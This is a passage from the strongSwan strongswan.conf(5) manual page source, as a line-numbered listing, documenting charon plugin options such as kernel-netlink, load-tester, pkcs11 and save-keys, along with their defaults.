958: considered successful if the command executes normally with an exit code of
959: zero. For all other exit codes IKE_SA authorization is rejected.
960:
961: The following environment variables get passed to the script:
962: .RI "" "IKE_UNIQUE_ID" ":"
963: The IKE_SA numerical unique identifier.
964: .RI "" "IKE_NAME" ":"
965: The peer configuration
966: connection name.
967: .RI "" "IKE_LOCAL_HOST" ":"
968: Local IKE IP address.
969: .RI "" "IKE_REMOTE_HOST" ":"
970: Remote IKE IP address.
971: .RI "" "IKE_LOCAL_ID" ":"
972: Local IKE identity.
973: .RI "" "IKE_REMOTE_ID" ":"
974: Remote IKE identity.
975: .RI "" "IKE_REMOTE_EAP_ID" ":"
976: Remote EAP or XAuth identity, if used.
977:
978: .TP
979: .BR charon.plugins.forecast.groups " [224.0.0.1,224.0.0.22,224.0.0.251,224.0.0.252,239.255.255.250]"
980: Comma separated list of multicast groups to join locally. The local host
981: receives and forwards packets in the local LAN for joined multicast groups only.
982: Packets matching the list of multicast groups get forwarded to connected
983: clients. The default group includes host multicasts, IGMP, mDNS, LLMNR and
984: SSDP/WS\-Discovery, and is usually a good choice for Windows clients.
985:
986: .TP
987: .BR charon.plugins.forecast.interface " []"
988: Name of the local interface to listen for broadcasts messages to forward. If no
989: interface is configured, the first usable interface is used, which is usually
990: just fine for single\-homed hosts. If your host has multiple interfaces, set this
991: option to the local LAN interface you want to forward broadcasts from/to.
992:
993: .TP
994: .BR charon.plugins.forecast.reinject " []"
995: Comma separated list of CHILD_SA configuration names for which to perform
996: multi/broadcast reinjection. For clients connecting over such a configuration,
997: any multi/broadcast received over the tunnel gets reinjected to all active
998: tunnels. This makes the broadcasts visible to other peers, and for examples
999: allows clients to see others shares. If disabled, multi/broadcast messages
1000: received over a tunnel are injected to the local network only, but not to other
1001: IPsec clients.
1002:
1003: .TP
1004: .BR charon.plugins.gcrypt.quick_random " [no]"
1005: Use faster random numbers in gcrypt; for testing only, produces weak keys!
1006:
1007: .TP
1008: .BR charon.plugins.ha.autobalance " [0]"
1009: Interval in seconds to automatically balance handled segments between nodes. Set
1010: to 0 to disable.
1011:
1012: .TP
1013: .BR charon.plugins.ha.fifo_interface " [yes]"
1014: .TP
1015: .BR charon.plugins.ha.heartbeat_delay " [1000]"
1016: .TP
1017: .BR charon.plugins.ha.heartbeat_timeout " [2100]"
1018: .TP
1019: .BR charon.plugins.ha.local " []"
1020: .TP
1021: .BR charon.plugins.ha.monitor " [yes]"
1022: .TP
1023: .BR charon.plugins.ha.pools " []"
1024: .TP
1025: .BR charon.plugins.ha.remote " []"
1026: .TP
1027: .BR charon.plugins.ha.resync " [yes]"
1028: .TP
1029: .BR charon.plugins.ha.secret " []"
1030: .TP
1031: .BR charon.plugins.ha.segment_count " [1]"
1032: .TP
1033: .BR charon.plugins.ipseckey.enable " [no]"
1034: Enable fetching of IPSECKEY RRs via DNS.
1035:
1036: .TP
1037: .BR charon.plugins.kernel-libipsec.allow_peer_ts " [no]"
1038: Allow that the remote traffic selector equals the IKE peer. The route installed
1039: for such traffic (via TUN device) usually prevents further IKE traffic. The
1040: fwmark options for the
1041: .RI "" "kernel\-netlink" ""
1042: and
1043: .RI "" "socket\-default" ""
1044: plugins can be used
1045: to circumvent that problem.
1046:
1047: .TP
1048: .BR charon.plugins.kernel-netlink.buflen " [<min(PAGE_SIZE, 8192)>]"
1049: Buffer size for received Netlink messages.
1050:
1051: .TP
1052: .BR charon.plugins.kernel-netlink.force_receive_buffer_size " [no]"
1053: If the maximum Netlink socket receive buffer in bytes set by
1054: .RI "" "receive_buffer_size" ""
1055: exceeds the system\-wide maximum from
1056: /proc/sys/net/core/rmem_max, this option can be used to override the limit.
1057: Enabling this option requires special privileges (CAP_NET_ADMIN).
1058:
1059: .TP
1060: .BR charon.plugins.kernel-netlink.fwmark " []"
1061: Firewall mark to set on the routing rule that directs traffic to our routing
1062: table. The format is [!]mark[/mask], where the optional exclamation mark inverts
1063: the meaning (i.e. the rule only applies to packets that don't match the mark).
1064:
1065: .TP
1066: .BR charon.plugins.kernel-netlink.hw_offload_feature_interface " [lo]"
1067: If the kernel supports hardware offloading, the plugin needs to find the feature
1068: flag which represents hardware offloading support for network devices. Using the
1069: loopback device for this purpose is usually fine, since it should always be
1070: present. For rare cases in which the loopback device cannot be used to obtain
1071: the appropriate feature flag, this option can be used to specify an alternative
1072: interface for offload feature detection.
1073:
1074: .TP
1075: .BR charon.plugins.kernel-netlink.ignore_retransmit_errors " [no]"
1076: Whether to ignore errors potentially resulting from a retransmission.
1077:
1078: .TP
1079: .BR charon.plugins.kernel-netlink.mss " [0]"
1080: MSS to set on installed routes, 0 to disable.
1081:
1082: .TP
1083: .BR charon.plugins.kernel-netlink.mtu " [0]"
1084: MTU to set on installed routes, 0 to disable.
1085:
1086: .TP
1087: .BR charon.plugins.kernel-netlink.parallel_route " [no]"
1088: Whether to perform concurrent Netlink ROUTE queries on a single socket. While
1089: parallel queries can improve throughput, it has more overhead. On vanilla Linux,
1090: DUMP queries fail with EBUSY and must be retried, further decreasing
1091: performance.
1092:
1093: .TP
1094: .BR charon.plugins.kernel-netlink.parallel_xfrm " [no]"
1095: Whether to perform concurrent Netlink XFRM queries on a single socket.
1096:
1097: .TP
1098: .BR charon.plugins.kernel-netlink.policy_update " [no]"
1099: Whether to always use XFRM_MSG_UPDPOLICY to install policies.
1100:
1101: .TP
1102: .BR charon.plugins.kernel-netlink.port_bypass " [no]"
1103: Whether to use port or socket based IKE XFRM bypass policies. IKE bypass
1104: policies are used to exempt IKE traffic from XFRM processing. The default socket
1105: based policies are directly tied to the IKE UDP sockets, port based policies use
1106: global XFRM bypass policies for the used IKE UDP ports.
1107:
1108: .TP
1109: .BR charon.plugins.kernel-netlink.process_rules " [no]"
1110: Whether to process changes in routing rules to trigger roam events. This is
1111: currently only useful if the kernel based route lookup is used (i.e. if route
1112: installation is disabled or an inverted fwmark match is configured).
1113:
1114: .TP
1115: .BR charon.plugins.kernel-netlink.receive_buffer_size " [0]"
1116: Maximum Netlink socket receive buffer in bytes. This value controls how many
1117: bytes of Netlink messages can be received on a Netlink socket. The default value
1118: is set by /proc/sys/net/core/rmem_default. The specified value cannot exceed the
1119: system\-wide maximum from /proc/sys/net/core/rmem_max, unless
1120: .RI "" "force_receive_buffer_size" ""
1121: is enabled.
1122:
1123: .TP
1124: .BR charon.plugins.kernel-netlink.retries " [0]"
1125: Number of Netlink message retransmissions to send on timeout.
1126:
1127: .TP
1128: .BR charon.plugins.kernel-netlink.roam_events " [yes]"
1129: Whether to trigger roam events when interfaces, addresses or routes change.
1130:
1131: .TP
1132: .BR charon.plugins.kernel-netlink.set_proto_port_transport_sa " [no]"
1133: Whether to set protocol and ports in the selector installed on transport mode
1134: IPsec SAs in the kernel. While doing so enforces policies for inbound traffic,
1135: it also prevents the use of a single IPsec SA by more than one traffic selector.
1136:
1137: .TP
1138: .B charon.plugins.kernel-netlink.spdh_thresh
1139: .br
1140: XFRM policy hashing threshold configuration for IPv4 and IPv6.
1141:
1142: The section defines hashing thresholds to configure in the kernel during daemon
1143: startup. Each address family takes a threshold for the local subnet of an IPsec
1144: policy (src in out\-policies, dst in in\- and forward\-policies) and the remote
1145: subnet (dst in out\-policies, src in in\- and forward\-policies).
1146:
1147: If the subnet has more or equal net bits than the threshold, the first threshold
1148: bits are used to calculate a hash to lookup the policy.
1149:
1150: Policy hashing thresholds are not supported before Linux 3.18 and might conflict
1151: with socket policies before Linux 4.8.
1152:
1153: .TP
1154: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv4.lbits " [32]"
1155: Local subnet XFRM policy hashing threshold for IPv4.
1156:
1157: .TP
1158: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv4.rbits " [32]"
1159: Remote subnet XFRM policy hashing threshold for IPv4.
1160:
1161: .TP
1162: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv6.lbits " [128]"
1163: Local subnet XFRM policy hashing threshold for IPv6.
1164:
1165: .TP
1166: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv6.rbits " [128]"
1167: Remote subnet XFRM policy hashing threshold for IPv6.
1168:
1169: .TP
1170: .BR charon.plugins.kernel-netlink.timeout " [0]"
1171: Netlink message retransmission timeout, 0 to disable retransmissions.
1172:
1173: .TP
1174: .BR charon.plugins.kernel-netlink.xfrm_acq_expires " [165]"
1175: Lifetime of XFRM acquire state created by the kernel when traffic matches a trap
1176: policy. The value gets written to /proc/sys/net/core/xfrm_acq_expires.
1177: Indirectly controls the delay between XFRM acquire messages triggered by the
1178: kernel for a trap policy. The same value is used as timeout for SPIs allocated
1179: by the kernel. The default value equals the total retransmission timeout for
1180: IKE messages, see IKEv2 RETRANSMISSION in
1181: .RB "" "strongswan.conf" "(5)."
1182:
1183:
1184: .TP
1185: .BR charon.plugins.kernel-pfkey.events_buffer_size " [0]"
1186: Size of the receive buffer for the event socket (0 for default size). Because
1187: events are received asynchronously installing e.g. lots of policies may require
1188: a larger buffer than the default on certain platforms in order to receive all
1189: messages.
1190:
1191: .TP
1192: .BR charon.plugins.kernel-pfkey.route_via_internal " [no]"
1193: Whether to use the internal or external interface in installed routes. The
1194: internal interface is the one where the IP address contained in the local
1195: traffic selector is located, the external interface is the one over which the
1196: destination address of the IPsec tunnel can be reached. This is not relevant if
1197: virtual IPs are used, for which a TUN device is created that's used in the
1198: routes.
1199:
1200: .TP
1201: .BR charon.plugins.kernel-pfroute.vip_wait " [1000]"
1202: Time in ms to wait until virtual IP addresses appear/disappear before failing.
1203:
1204: .TP
1205: .BR charon.plugins.led.activity_led " []"
1206: .TP
1207: .BR charon.plugins.led.blink_time " [50]"
1208: .TP
1209: .B charon.plugins.load-tester
1210: .br
1211: Section to configure the load\-tester plugin, see LOAD TESTS in
1212: .RB "" "strongswan.conf" "(5)"
1213: for details.
1214:
1215: .TP
1216: .B charon.plugins.load-tester.addrs
1217: .br
1218: Section that contains key/value pairs with address pools (in CIDR notation) to
1219: use for a specific network interface e.g. eth0 = 10.10.0.0/16.
1220:
1221: .TP
1222: .BR charon.plugins.load-tester.addrs_keep " [no]"
1223: Whether to keep dynamic addresses even after the associated SA got terminated.
1224:
1225: .TP
1226: .BR charon.plugins.load-tester.addrs_prefix " [16]"
1227: Network prefix length to use when installing dynamic addresses. If set to \-1 the
1228: full address is used (i.e. 32 or 128).
1229:
1230: .TP
1231: .BR charon.plugins.load-tester.ca_dir " []"
1232: Directory to load (intermediate) CA certificates from.
1233:
1234: .TP
1235: .BR charon.plugins.load-tester.child_rekey " [600]"
1236: Seconds to start CHILD_SA rekeying after setup.
1237:
1238: .TP
1239: .BR charon.plugins.load-tester.crl " []"
1240: URI to a CRL to include as certificate distribution point in generated
1241: certificates.
1242:
1243: .TP
1244: .BR charon.plugins.load-tester.delay " [0]"
1245: Delay between initiations for each thread.
1246:
1247: .TP
1248: .BR charon.plugins.load-tester.delete_after_established " [no]"
1249: Delete an IKE_SA as soon as it has been established.
1250:
1251: .TP
1252: .BR charon.plugins.load-tester.digest " [sha1]"
1253: Digest algorithm used when issuing certificates.
1254:
1255: .TP
1256: .BR charon.plugins.load-tester.dpd_delay " [0]"
1257: DPD delay to use in load test.
1258:
1259: .TP
1260: .BR charon.plugins.load-tester.dynamic_port " [0]"
1261: Base port to be used for requests (each client uses a different port).
1262:
1263: .TP
1264: .BR charon.plugins.load-tester.eap_password " [default-pwd]"
1265: EAP secret to use in load test.
1266:
1267: .TP
1268: .BR charon.plugins.load-tester.enable " [no]"
1269: Enable the load testing plugin.
1270: .RB "" "WARNING" ":"
1271: Never enable this plugin on
1272: productive systems. It provides preconfigured credentials and allows an attacker
1273: to authenticate as any user.
1274:
1275: .TP
1276: .BR charon.plugins.load-tester.esp " [aes128-sha1]"
1277: CHILD_SA proposal to use for load tests.
1278:
1279: .TP
1280: .BR charon.plugins.load-tester.fake_kernel " [no]"
1281: Fake the kernel interface to allow load\-testing against self.
1282:
1283: .TP
1284: .BR charon.plugins.load-tester.ike_rekey " [0]"
1285: Seconds to start IKE_SA rekeying after setup.
1286:
1287: .TP
1288: .BR charon.plugins.load-tester.init_limit " [0]"
1289: Global limit of concurrently established SAs during load test.
1290:
1291: .TP
1292: .BR charon.plugins.load-tester.initiator " [0.0.0.0]"
1293: Address to initiate from.
1294:
1295: .TP
1296: .BR charon.plugins.load-tester.initiator_auth " [pubkey]"
1297: Authentication method(s) the initiator uses.
1298:
1299: .TP
1300: .BR charon.plugins.load-tester.initiator_id " []"
1301: Initiator ID used in load test.
1302:
1303: .TP
1304: .BR charon.plugins.load-tester.initiator_match " []"
1305: Initiator ID to match against as responder.
1306:
1307: .TP
1308: .BR charon.plugins.load-tester.initiator_tsi " []"
1309: Traffic selector on initiator side, as proposed by initiator.
1310:
1311: .TP
1312: .BR charon.plugins.load-tester.initiator_tsr " []"
1313: Traffic selector on responder side, as proposed by initiator.
1314:
1315: .TP
1316: .BR charon.plugins.load-tester.initiators " [0]"
1317: Number of concurrent initiator threads to use in load test.
1318:
1319: .TP
1320: .BR charon.plugins.load-tester.issuer_cert " []"
1321: Path to the issuer certificate (if not configured a hard\-coded default value is
1322: used).
1323:
1324: .TP
1325: .BR charon.plugins.load-tester.issuer_key " []"
1326: Path to private key that is used to issue certificates (if not configured a
1327: hard\-coded default value is used).
1328:
1329: .TP
1330: .BR charon.plugins.load-tester.iterations " [1]"
1331: Number of IKE_SAs to initiate by each initiator in load test.
1332:
1333: .TP
1334: .BR charon.plugins.load-tester.mode " [tunnel]"
1335: IPsec mode to use, one of
1336: .RI "" "tunnel" ","
1337: .RI "" "transport" ","
1338: or
1339: .RI "" "beet" "."
1340:
1341:
1342: .TP
1343: .BR charon.plugins.load-tester.pool " []"
1344: Provide INTERNAL_IPV4_ADDRs from a named pool.
1345:
1346: .TP
1347: .BR charon.plugins.load-tester.preshared_key " [<default-psk>]"
1348: Preshared key to use in load test.
1349:
1350: .TP
1351: .BR charon.plugins.load-tester.proposal " [aes128-sha1-modp768]"
1352: IKE proposal to use in load test.
1353:
1354: .TP
1355: .BR charon.plugins.load-tester.request_virtual_ip " [no]"
1.1.1.2 ! misho 1356: Request an INTERNAL_IPV4_ADDR and INTERNAL_IPV6_ADDR from the server.
1.1 misho 1357:
1358: .TP
1359: .BR charon.plugins.load-tester.responder " [127.0.0.1]"
1360: Address to initiation connections to.
1361:
1362: .TP
1363: .BR charon.plugins.load-tester.responder_auth " [pubkey]"
1364: Authentication method(s) the responder uses.
1365:
1366: .TP
1367: .BR charon.plugins.load-tester.responder_id " []"
1368: Responder ID used in load test.
1369:
1370: .TP
1371: .BR charon.plugins.load-tester.responder_tsi " [initiator_tsi]"
1372: Traffic selector on initiator side, as narrowed by responder.
1373:
1374: .TP
1375: .BR charon.plugins.load-tester.responder_tsr " [initiator_tsr]"
1376: Traffic selector on responder side, as narrowed by responder.
1377:
1378: .TP
1379: .BR charon.plugins.load-tester.shutdown_when_complete " [no]"
1380: Shutdown the daemon after all IKE_SAs have been established.
1381:
1382: .TP
1383: .BR charon.plugins.load-tester.socket " [unix://${piddir}/charon.ldt]"
1384: Socket provided by the load\-tester plugin.
1385:
1386: .TP
1387: .BR charon.plugins.load-tester.version " [0]"
1388: IKE version to use (0 means use IKEv2 as initiator and accept any version as
1389: responder).
1390:
1391: .TP
1392: .BR charon.plugins.lookip.socket " [unix://${piddir}/charon.lkp]"
1393: Socket provided by the lookip plugin.
1394:
1395: .TP
1396: .BR charon.plugins.ntru.parameter_set " [optimum]"
1397: The following parameter sets are available:
1398: .RB "" "x9_98_speed" ","
1399: .RB "" "x9_98_bandwidth" ","
1400: .RB "" "x9_98_balance" ""
1401: and
1402: .RB "" "optimum" ","
1403: the last set not being
1404: part of the X9.98 standard but having the best performance.
1405:
1406: .TP
1407: .BR charon.plugins.openssl.engine_id " [pkcs11]"
1408: ENGINE ID to use in the OpenSSL plugin.
1409:
1410: .TP
1411: .BR charon.plugins.openssl.fips_mode " [0]"
1412: Set OpenSSL FIPS mode: disabled(0), enabled(1), Suite B enabled(2).
1413:
1414: .TP
1415: .BR charon.plugins.osx-attr.append " [yes]"
1416: Whether DNS servers are appended to existing entries, instead of replacing them.
1417:
1418: .TP
1419: .B charon.plugins.p-cscf.enable
1420: .br
1421: Section to enable requesting P\-CSCF server addresses for individual connections.
1422:
1423: .TP
1424: .BR charon.plugins.p-cscf.enable.<conn> " [no]"
1425: <conn> is the name of a connection with an ePDG from which to request P\-CSCF
1426: server addresses. Requests will be sent for addresses of the same families for
1427: which internal IPs are requested.
1428:
1429: .TP
1430: .B charon.plugins.pkcs11.modules
1431: .br
1432: List of available PKCS#11 modules.
1433:
1434: .TP
1435: .BR charon.plugins.pkcs11.modules.<name>.load_certs " [yes]"
1436: Whether to automatically load certificates from tokens.
1437:
1438: .TP
1439: .BR charon.plugins.pkcs11.modules.<name>.os_locking " [no]"
1440: Whether OS locking should be enabled for this module.
1441:
1442: .TP
1443: .BR charon.plugins.pkcs11.modules.<name>.path " []"
1444: Full path to the shared object file of this PKCS#11 module.
1445:
1446: .TP
1447: .BR charon.plugins.pkcs11.reload_certs " [no]"
1448: Reload certificates from all tokens if charon receives a SIGHUP.
1449:
1450: .TP
1451: .BR charon.plugins.pkcs11.use_dh " [no]"
1452: Whether the PKCS#11 modules should be used for DH and ECDH (see
1453: .RI "" "use_ecc" ""
1454: option).
1455:
1456: .TP
1457: .BR charon.plugins.pkcs11.use_ecc " [no]"
1458: Whether the PKCS#11 modules should be used for ECDH and ECDSA public key
1459: operations. ECDSA private keys can be used regardless of this option.
1460:
1461: .TP
1462: .BR charon.plugins.pkcs11.use_hasher " [no]"
1463: Whether the PKCS#11 modules should be used to hash data.
1464:
1465: .TP
1466: .BR charon.plugins.pkcs11.use_pubkey " [no]"
1467: Whether the PKCS#11 modules should be used for public key operations, even for
1468: keys not stored on tokens.
1469:
1470: .TP
1471: .BR charon.plugins.pkcs11.use_rng " [no]"
1472: Whether the PKCS#11 modules should be used as RNG.
1473:
1474: .TP
1475: .BR charon.plugins.radattr.dir " []"
1476: Directory where RADIUS attributes are stored in client\-ID specific files.
1477:
1478: .TP
1479: .BR charon.plugins.radattr.message_id " [-1]"
1480: Attributes are added to all IKE_AUTH messages by default (\-1), or only to the
1481: IKE_AUTH message with the given IKEv2 message ID.
1482:
1483: .TP
1484: .BR charon.plugins.random.random " [${random_device}]"
1485: File to read random bytes from.
1486:
1487: .TP
1488: .BR charon.plugins.random.strong_equals_true " [no]"
1489: If set to yes the RNG_STRONG class reads random bytes from the same source as
1490: the RNG_TRUE class.
1491:
1492: .TP
1493: .BR charon.plugins.random.urandom " [${urandom_device}]"
1494: File to read pseudo random bytes from.
1495:
1496: .TP
1497: .BR charon.plugins.resolve.file " [/etc/resolv.conf]"
1498: File where to add DNS server entries.
1499:
1500: .TP
1501: .BR charon.plugins.resolve.resolvconf.iface_prefix " [lo.inet.ipsec.]"
1502: Prefix used for interface names sent to
1503: .RB "" "resolvconf" "(8)."
1504: The nameserver
1505: address is appended to this prefix to make it unique. The result has to be a
1506: valid interface name according to the rules defined by resolvconf. Also, it
1507: should have a high priority according to the order defined in
1508: .RB "" "interface\-order" "(5)."
1509:
1510:
1511: .TP
1512: .BR charon.plugins.revocation.enable_crl " [yes]"
1513: Whether CRL validation should be enabled.
1514:
1515: .TP
1516: .BR charon.plugins.revocation.enable_ocsp " [yes]"
1517: Whether OCSP validation should be enabled.
1518:
1519: .TP
1520: .BR charon.plugins.save-keys.esp " [no]"
1521: Whether to save ESP keys.
1522:
1523: .TP
1524: .BR charon.plugins.save-keys.ike " [no]"
1525: Whether to save IKE keys.
1526:
1527: .TP
1528: .BR charon.plugins.save-keys.load " [no]"
1529: Whether to load the plugin.
1530:
1531: .TP
1532: .BR charon.plugins.save-keys.wireshark_keys " []"
1533: Directory where the keys are stored in the format supported by Wireshark. IKEv1
1534: keys are stored in the
1535: .RI "" "ikev1_decryption_table" ""
1536: file. IKEv2 keys are stored in
1537: the
1538: .RI "" "ikev2_decryption_table" ""
1539: file. Keys for ESP CHILD_SAs are stored in the
1540: .RI "" "esp_sa" ""
1541: file.
1542:
1543: .TP
1544: .BR charon.plugins.socket-default.fwmark " []"
1545: Firewall mark to set on outbound packets.
1546:
1547: .TP
1548: .BR charon.plugins.socket-default.set_source " [yes]"
1549: Set source address on outbound packets, if possible.
1550:
1551: .TP
1552: .BR charon.plugins.socket-default.set_sourceif " [no]"
1553: Force sending interface on outbound packets, if possible. This allows using IPv6
1554: link\-local addresses as tunnel endpoints.
1555:
1556: .TP
1557: .BR charon.plugins.socket-default.use_ipv4 " [yes]"
1558: Listen on IPv4, if possible.
1559:
1560: .TP
1561: .BR charon.plugins.socket-default.use_ipv6 " [yes]"
1562: Listen on IPv6, if possible.
1563:
1564: .TP
1565: .BR charon.plugins.sql.database " []"
1566: Database URI for charon's SQL plugin. If it contains a password, make sure to
1567: adjust the permissions of the config file accordingly.
1568:
1569: .TP
1570: .BR charon.plugins.sql.loglevel " [-1]"
1571: Loglevel for logging to SQL database.
1572:
1573: .TP
1574: .BR charon.plugins.stroke.allow_swap " [yes]"
1575: Analyze addresses/hostnames in
1576: .RI "" "left|right" ""
1577: to detect which side is local and
1578: swap configuration options if necessary. If disabled
1579: .RI "" "left" ""
1580: is always
1581: .RI "" "local" "."
1582:
1583:
1584: .TP
1585: .BR charon.plugins.stroke.ignore_missing_ca_basic_constraint " [no]"
1586: Treat certificates in ipsec.d/cacerts and ipsec.conf ca sections as CA
1587: certificates even if they don't contain a CA basic constraint.
1588:
1589: .TP
1590: .BR charon.plugins.stroke.max_concurrent " [4]"
1591: Maximum number of stroke messages handled concurrently.
1592:
1593: .TP
1594: .BR charon.plugins.stroke.prevent_loglevel_changes " [no]"
1595: If enabled log level changes via stroke socket are not allowed.
1596:
1597: .TP
1598: .BR charon.plugins.stroke.secrets_file " [${sysconfdir}/ipsec.secrets]"
1599: Location of the ipsec.secrets file
1600:
1601: .TP
1602: .BR charon.plugins.stroke.socket " [unix://${piddir}/charon.ctl]"
1603: Socket provided by the stroke plugin.
1604:
1605: .TP
1606: .BR charon.plugins.stroke.timeout " [0]"
1607: Timeout in ms for any stroke command. Use 0 to disable the timeout.
1608:
1609: .TP
1610: .BR charon.plugins.systime-fix.interval " [0]"
1611: Interval in seconds to check system time for validity. 0 disables the check.
1612:
1613: .TP
1614: .BR charon.plugins.systime-fix.reauth " [no]"
1615: Whether to use reauth or delete if an invalid cert lifetime is detected.
1616:
1617: .TP
1618: .BR charon.plugins.systime-fix.threshold " []"
1619: Threshold date where system time is considered valid. Disabled if not specified.
1620:
1621: .TP
1622: .BR charon.plugins.systime-fix.threshold_format " [%Y]"
1623: .RB "" "strptime" "(3)"
1624: format used to parse threshold option.
1625:
1626: .TP
1627: .BR charon.plugins.systime-fix.timeout " [0s]"
1628: How long to wait for a valid system time if an interval is configured. 0 to
1629: recheck indefinitely.
1630:
1631: .TP
1632: .BR charon.plugins.tnc-ifmap.client_cert " []"
1633: Path to X.509 certificate file of IF\-MAP client.
1634:
1635: .TP
1636: .BR charon.plugins.tnc-ifmap.client_key " []"
1637: Path to private key file of IF\-MAP client.
1638:
1639: .TP
1640: .BR charon.plugins.tnc-ifmap.device_name " []"
1641: Unique name of strongSwan server as a PEP and/or PDP device.
1642:
1643: .TP
1644: .BR charon.plugins.tnc-ifmap.renew_session_interval " [150]"
1645: Interval in seconds between periodic IF\-MAP RenewSession requests.
1646:
1647: .TP
1648: .BR charon.plugins.tnc-ifmap.server_cert " []"
1649: Path to X.509 certificate file of IF\-MAP server.
1650:
1651: .TP
1652: .BR charon.plugins.tnc-ifmap.server_uri " [https://localhost:8444/imap]"
1653: URI of the form [https://]servername[:port][/path].
1654:
1655: .TP
1656: .BR charon.plugins.tnc-ifmap.username_password " []"
1657: Credentials of IF\-MAP client of the form username:password. If set, make sure to
1658: adjust the permissions of the config file accordingly.
1659:
1660: .TP
1661: .BR charon.plugins.tnc-imc.dlclose " [yes]"
1662: Unload IMC after use.
1663:
1664: .TP
1665: .BR charon.plugins.tnc-imc.preferred_language " [en]"
1666: Preferred language for TNC recommendations.
1667:
1668: .TP
1669: .BR charon.plugins.tnc-imv.dlclose " [yes]"
1670: Unload IMV after use.
1671:
1672: .TP
1673: .BR charon.plugins.tnc-imv.recommendation_policy " [default]"
1674: TNC recommendation policy, one of
1675: .RI "" "default" ","
1676: .RI "" "any" ","
1677: or
1678: .RI "" "all" "."
1679:
1680:
1681: .TP
1682: .BR charon.plugins.tnc-pdp.pt_tls.enable " [yes]"
1683: Enable PT\-TLS protocol on the strongSwan PDP.
1684:
1685: .TP
1686: .BR charon.plugins.tnc-pdp.pt_tls.port " [271]"
1687: PT\-TLS server port the strongSwan PDP is listening on.
1688:
1689: .TP
1690: .BR charon.plugins.tnc-pdp.radius.enable " [yes]"
1691: Enable RADIUS protocol on the strongSwan PDP.
1692:
1693: .TP
1694: .BR charon.plugins.tnc-pdp.radius.method " [ttls]"
1695: EAP tunnel method to be used.
1696:
1697: .TP
1698: .BR charon.plugins.tnc-pdp.radius.port " [1812]"
1699: RADIUS server port the strongSwan PDP is listening on.
1700:
1701: .TP
1702: .BR charon.plugins.tnc-pdp.radius.secret " []"
1703: Shared RADIUS secret between strongSwan PDP and NAS. If set, make sure to adjust
1704: the permissions of the config file accordingly.
1705:
1706: .TP
1707: .BR charon.plugins.tnc-pdp.server " []"
1708: Name of the strongSwan PDP as contained in the AAA certificate.
1709:
1710: .TP
1711: .BR charon.plugins.tnc-pdp.timeout " []"
1712: Timeout in seconds before closing incomplete connections.
1713:
1714: .TP
1715: .BR charon.plugins.tnccs-11.max_message_size " [45000]"
1716: Maximum size of a PA\-TNC message (XML & Base64 encoding).
1717:
1718: .TP
1719: .BR charon.plugins.tnccs-20.max_batch_size " [65522]"
1720: Maximum size of a PB\-TNC batch (upper limit via PT\-EAP = 65529).
1721:
1722: .TP
1723: .BR charon.plugins.tnccs-20.max_message_size " [65490]"
1724: Maximum size of a PA\-TNC message (upper limit via PT\-EAP = 65497).
1725:
1726: .TP
1727: .BR charon.plugins.tnccs-20.mutual " [no]"
1728: Enable PB\-TNC mutual protocol.
1729:
1730: .TP
1731: .BR charon.plugins.tnccs-20.tests.pb_tnc_noskip " [no]"
1732: Send an unsupported PB\-TNC message type with the NOSKIP flag set.
1733:
1734: .TP
1735: .BR charon.plugins.tnccs-20.tests.pb_tnc_version " [2]"
1736: Send a PB\-TNC batch with a modified PB\-TNC version.
1737:
1738: .TP
1739: .BR charon.plugins.tpm.fips_186_4 " [no]"
1740: Is the TPM 2.0 FIPS\-186\-4 compliant, forcing e.g. the use of the default salt
1741: length instead of maximum salt length with RSAPSS padding.
1742:
1743: .TP
1744: .BR charon.plugins.tpm.tcti.name " [device|tabrmd]"
1745: Name of TPM 2.0 TCTI library. Valid values:
1746: .RI "" "tabrmd" ","
1747: .RI "" "device" ""
1748: or
1749: .RI "" "mssim" "."
1750: Defaults are
1751: .RI "" "device" ""
1752: if the
1753: .RI "" "/dev/tpmrm0" ""
1754: in\-kernel TPM 2.0 resource manager
1755: device exists, and
1756: .RI "" "tabrmd" ""
1757: otherwise, requiring the d\-bus based TPM 2.0 access
1758: broker and resource manager to be available.
1759:
1760: .TP
1761: .BR charon.plugins.tpm.tcti.opts " [/dev/tpmrm0|<none>]"
1762: Options for the TPM 2.0 TCTI library. Defaults are
1763: .RI "" "/dev/tpmrm0" ""
1764: if the TCTI
1765: library name is
1766: .RI "" "device" ""
1767: and no options otherwise.
1768:
1769: .TP
1770: .BR charon.plugins.tpm.use_rng " [no]"
1771: Whether the TPM should be used as RNG.
1772:
1773: .TP
1774: .BR charon.plugins.unbound.dlv_anchors " []"
1775: File to read trusted keys for DLV (DNSSEC Lookaside Validation) from. It uses
1776: the same format as
1777: .RI "" "trust_anchors" "."
1778: Only one DLV can be configured, which is
1779: then used as a root trusted DLV, this means that it is a lookaside for the root.
1780:
1781: .TP
1782: .BR charon.plugins.unbound.resolv_conf " [/etc/resolv.conf]"
1783: File to read DNS resolver configuration from.
1784:
1785: .TP
1786: .BR charon.plugins.unbound.trust_anchors " [/etc/ipsec.d/dnssec.keys]"
1787: File to read DNSSEC trust anchors from (usually root zone KSK). The format of
1788: the file is the standard DNS Zone file format, anchors can be stored as DS or
1789: DNSKEY entries in the file.
1790:
1791: .TP
1792: .BR charon.plugins.updown.dns_handler " [no]"
1793: Whether the updown script should handle DNS servers assigned via IKEv1 Mode
1794: Config or IKEv2 Config Payloads (if enabled they can't be handled by other
1795: plugins, like resolve)
1796:
1797: .TP
1798: .BR charon.plugins.vici.socket " [unix://${piddir}/charon.vici]"
1799: Socket the vici plugin serves clients.
1800:
1801: .TP
1802: .BR charon.plugins.whitelist.enable " [yes]"
1803: Enable loaded whitelist plugin.
1804:
1805: .TP
1806: .BR charon.plugins.whitelist.socket " [unix://${piddir}/charon.wlst]"
1807: Socket provided by the whitelist plugin.
1808:
1809: .TP
1810: .BR charon.plugins.wolfssl.fips_mode " [no]"
1811: Enable to prevent loading the plugin if wolfSSL is not in FIPS mode.
1812:
1813: .TP
1814: .BR charon.plugins.xauth-eap.backend " [radius]"
1815: EAP plugin to be used as backend for XAuth credential verification.
1816:
1817: .TP
1818: .BR charon.plugins.xauth-pam.pam_service " [login]"
1819: PAM service to be used for authentication.
1820:
1821: .TP
1822: .BR charon.plugins.xauth-pam.session " [no]"
1823: Open/close a PAM session for each active IKE_SA.
1824:
1825: .TP
1826: .BR charon.plugins.xauth-pam.trim_email " [yes]"
1827: If an email address is received as an XAuth username, trim it to just the
1828: username part.
1829:
1830: .TP
1831: .BR charon.port " [500]"
1832: UDP port used locally. If set to 0 a random port will be allocated.
1833:
1834: .TP
